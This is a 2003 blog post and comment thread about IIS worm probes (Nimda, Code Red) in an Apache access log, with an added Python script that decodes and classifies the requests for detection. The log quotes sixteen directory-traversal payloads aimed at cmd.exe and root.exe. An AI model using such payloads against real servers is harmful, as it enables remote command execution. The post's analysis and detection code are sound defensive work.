Script kiddies.. so inefficient
Wouldn't it be quicker and easier to check what the server is running first? This box isn't Windows, so every one of those requests is a waste of bandwidth (probably not their own anyway, but still).
24.91.103.152 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
24.91.103.152 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
24.91.103.152 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.91.103.152 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.91.103.152 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.91.103.152 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.91.103.152 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.91.103.152 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.91.103.152 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
24.91.103.152 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
24.91.103.152 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.91.103.152 "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
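All sixteen request lines above are after the same two files, and that is easier to see mechanically than by eye. The Python below is an added example, not code from this post: it takes the sixteen lines as constructed sample input (copied verbatim from the post), decodes each path the way the two IIS decoding mistakes these probes were written for would (a percent-decode applied twice, so `%255c` becomes `%5c` becomes `\`, and a UTF-8 decoder that accepts overlong two-byte forms, so `%c0%af` becomes `/`), and reports that every path resolves to `cmd.exe` or to `root.exe`, the copy of `cmd.exe` that Code Red II left behind in `/scripts` and `/MSADC`. The overlong arithmetic imitates the bug rather than reimplementing IIS, and the `PROBE_TARGETS` list, the `encoding_tricks` labels and the `%c[01]%` check are my own choices.

```python
"""Decode and classify the IIS probe lines quoted above.

Added example, not code from the original post.  The sample log is the
post's own 16 lines (client, request line, status, bytes); the decoder
imitates the IIS double-decode and overlong-UTF-8 bugs (an assumption).
"""
import posixpath
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed input: the access-log lines from the post, verbatim.
SAMPLE_LOG = """\
24.91.103.152 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
24.91.103.152 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
24.91.103.152 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.91.103.152 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.91.103.152 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.91.103.152 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.91.103.152 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.91.103.152 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.91.103.152 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.91.103.152 "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
24.91.103.152 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
24.91.103.152 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.91.103.152 "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+)$'
)

# What every line is really after: cmd.exe itself, or root.exe, the copy of
# cmd.exe that Code Red II dropped into /scripts and /MSADC.  (My choice.)
PROBE_TARGETS = ("/cmd.exe", "/root.exe")


def lenient_utf8(data: bytes) -> bytes:
    """Fold overlong two-byte UTF-8 forms back to the ASCII byte they hide.

    A strict decoder rejects C0 AF; the buggy one did the arithmetic anyway:
    (0xC0 & 0x1F) << 6 | (0xAF & 0x3F) == 0x2F == '/'.  The same sum turns
    C1 9C and C1 1C into 0x5C == '\\'.  Valid multi-byte UTF-8 is left alone.
    """
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:            # overlong: an ASCII byte in two-byte clothing
                out.append(cp)
                i += 2
                continue
        out.append(b)
        i += 1
    return bytes(out)


def normalize_path(raw: str) -> str:
    """Return the path a doubly-decoding, overlong-tolerant server would open."""
    data = raw.encode("utf-8", "surrogateescape")
    # Pass 1 is the legitimate decode; pass 2 is the superfluous-decode bug
    # (%255c -> %5c -> '\').  Overlong folding runs after each pass.
    for _ in range(2):
        data = lenient_utf8(unquote_to_bytes(data))
    text = data.decode("utf-8", "replace").replace("\\", "/")
    return posixpath.normpath(text)  # collapses the ../../.. chains at root


def encoding_tricks(path: str) -> list:
    """Label the obfuscations visible in the raw (undecoded) path."""
    p, tricks = path.lower(), []
    if "%%" in p:
        tricks.append("malformed-percent")   # %%35%63: Apache answers 400
    if "%25" in p:
        tricks.append("double-encoded")
    if re.search(r"%c[01]%", p):
        tricks.append("overlong-utf8")
    return tricks


def classify(line: str):
    """Parse one log line into a record, or None if it is not a request line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    target = normalize_path(path)
    return {
        "client": m["client"], "status": int(m["status"]), "raw": path,
        "target": target, "query": query,      # /c+dir is "cmd.exe /c dir"
        "tricks": encoding_tricks(path),
        "probe": target.lower().endswith(PROBE_TARGETS),
    }


def scan(log: str) -> list:
    return [r for r in (classify(l) for l in log.splitlines()) if r]


def summarize(records: list) -> dict:
    probes = [r for r in records if r["probe"]]
    return {
        "requests": len(records), "probes": len(probes),
        "clients": sorted({r["client"] for r in probes}),
        "targets": Counter(r["target"] for r in probes),
        "status": Counter(r["status"] for r in probes),
    }


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f'{r["status"]} {r["target"]:<26} {",".join(r["tricks"]) or "-":<28} {r["raw"]}')
    print(summarize(scan(SAMPLE_LOG)))
```

Twelve of the sixteen paths normalize to `/winnt/system32/cmd.exe`; the other four are the two `root.exe` locations and the `/c` and `/d` virtual directories that IIS could map to drive roots. The two 400s are Apache refusing the malformed `%%` encoding before it looked anything up; the classifier decodes them anyway, because the question for detection is what the request was after, not what this particular server did with it. Because `lenient_utf8` generalizes the arithmetic instead of listing the four byte pairs seen here, it also folds other overlong two-byte forms while leaving valid UTF-8 such as `%c3%a9` untouched.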
Comments
We have these too, at quite regular intervals. Had to laugh the first time I saw it. Best was one weekend where they tried every three hours or so.
But I have seen people try out even more stupid things. Especially nice when the 'script kiddies' don't use IP masquerading or some such mechanism.
Posted by: Yashima | April 20, 2003 11:03 AM
Those log entries are most likely the result of a visit from your friendly neighborhood Nimda worm variant. No script kiddies at all.
Posted by: joat | April 20, 2003 11:07 AM
Hehe, I get these all the time. Probably a worm as joat says, or a bot that's scanning the web for vulnerable servers.
Posted by: Baba | April 20, 2003 11:50 AM
What blows my mind is that there are still people out there who haven't patched their systems that are STILL infected with nimda. Though the probes have slowed down for me a bit lately. I actually got a code red one just yesterday.
Posted by: gregory | April 20, 2003 04:50 PM
I still see at least one probe a day from others within the Verizon DSL netblock. *sigh*
Posted by: Jon | April 21, 2003 12:11 PM
You have to love those children who just have to run a web server from home...
bash-2.05a$ nslookup 24.91.103.152
Server: athena.int.no.la.us.xxx-xxx.xxx
Address: 10.0.0.1
Name: h0030f11433a7.ne.client2.attbi.com
Address: 24.91.103.152
It's so easy, anyone can just fire up web services on their XP box... >:|
Some people need to be schooled (yeah, I know, before you say anything) in proper webserver software.... *cough* Apache *cough*
Did you refer the little bugger's IP and all the logs to ATT Abuse?
-J
Posted by: bad-magic-number, aka Jeremy | April 21, 2003 02:33 PM
Yep - just Nimda making the rounds. Instead of seeing those in my logs over and over again, I just chose to alias root.exe to a script that disallows further access to the webserver.
Posted by: Damon | April 21, 2003 10:10 PM
Would it make sense to fake a success? Perhaps this could be used to hinder further proceedings? Or what would happen if you give it a server redirect to itself? Self-Attack??? >:)
Posted by: Gerald | April 23, 2003 10:50 AM
Hey! I'm running a webserver from home. I'm not sure if my ISP likes it, but meh. Glad someone said Nimda; I've been reporting the buggers.
I think the difference is that I'm running OpenBSD. I refuse to run A pachy server, instead thttpd works fine. 1-800-COMCAST... here I go again.
Posted by: David | October 2, 2003 03:02 AM